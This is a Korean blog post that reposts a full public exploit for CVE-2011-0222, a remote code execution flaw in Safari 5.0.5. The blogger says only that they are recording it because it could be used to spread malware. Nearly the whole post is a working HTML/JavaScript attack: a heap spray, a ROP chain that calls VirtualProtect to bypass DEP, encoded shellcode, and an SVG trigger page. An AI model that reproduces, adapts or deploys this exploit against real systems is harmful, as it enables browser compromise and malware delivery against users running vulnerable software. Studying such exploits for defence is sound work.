Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)

악성코드 유포에 이용될수도 있을거 같아 기록해 둡니다.
http://www.exploit-db.com/exploits/17575/

<html>
<head>
<script>
/* 
   Abysssec Public Advisory 

   apple killed one of our 0day  no point to keep it private anymore :( 
   there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool way to bypass it and stand alone module . 
   this exploiting using ROP to bypass permanent DEP. 

   note : Change spray range if not work on your machine. 

   CVE-2011-0222 : 

   WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) 
   via a crafted web site a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.

   Tested on windows XP SP3 and safari 5.0.5 

   feel free to contact us at : info [at] abysssec.com 

   and follow @abysssec for updates 
*/
var cur_id;

var object_whiteList = {'document':1, 'rootElement':1, 'preserveAspectRatio':1,'baseVal':1, 'align':1 };

function crash(target) 
{
    var members = [];
    for (var name in target) members.push(name);

    for (var num in members) 
    {
        var name = members[num];

        if(object_whiteList[name] != 1)
            continue;

        var cur_value = null;
        cur_value = eval('target.' + name);

        if (typeof cur_value == 'object' )
            crash(cur_value);    

    }

};

function toggle_gc() {

  for (var i = 0; i < 10000; i++) {
    var s = new String("AAAA" + Math.random());
    eval("gc_string = s");
  }

}

function spray(size, n, payload)
{
    var string_size = size / 2;
    var str = payload;
    var c =  unescape('%u4545%u4545');
    while (str.length < string_size)
        str += c;

    var h1 = [];
    h1[0] = str.substring(0, string_size)
    for( i = 1; i <= n; i++)
        h1[i] = unescape(h1[0])

};

var t1;
var state = 0;

function event_loop() 
{    
    if(state == 0)
        crash( t1);
    else
    {    var payload = unescape('%u0004%u7fc0');
        spray(32, 5000, payload);
    }
    state = (state + 1) % 2;    
    setTimeout('event_loop()', 10);
}

function run_tests() 
{
  toggle_gc();
  var payload = unescape('%u0004%u7fc0%u000c%u7fc0'
  + '%uB1C1%u7C9F'        // mov esp, [ecx] | some instruction | ret (stackPivot)
  + '%u0010%u7fc0%u4242%u4242'
  + '%uD53A%u7C96'        // pop ecx | ret
  + '%u1AD4%u7C80'        // virtualProtect
  + '%u29D2%u7C83'        // mov eax, ecx | ret
  + '%u99DE%u7642'        // call eax | pop ecx | ret
  + '%u003c%u7fc0'        // shellcode Address
  + '%u2000%u0000'        // size
  + '%u0040%u0000'        // permission
  + '%u0034%u7fc0'        
  + '%u6666%u6666'
  + '%u003c%u7fc0');

  var shellcode =  unescape("%u9090%u8166%ufce4%u31ff%u56f6%u8b64%u3076%u768b%u8b0c%u1c76%u6e8b%u8b08%u8b36%u3c5d%u5c8b%u781d%ueb01%u4b8b%u6718%uece3%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucc75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ff");
  payload += shellcode;

  spray(300,20000, payload);  
  t1 = window.open('target.svg', 't1');
  setTimeout('event_loop()', 1000); 
}

</script>

</head>

<body onload="run_tests()">
<svg></svg>
</body>
</html>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg width="100%" height="100%" version="1.1" xmlns="http://www.w3.org/2000/svg">

</svg>

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다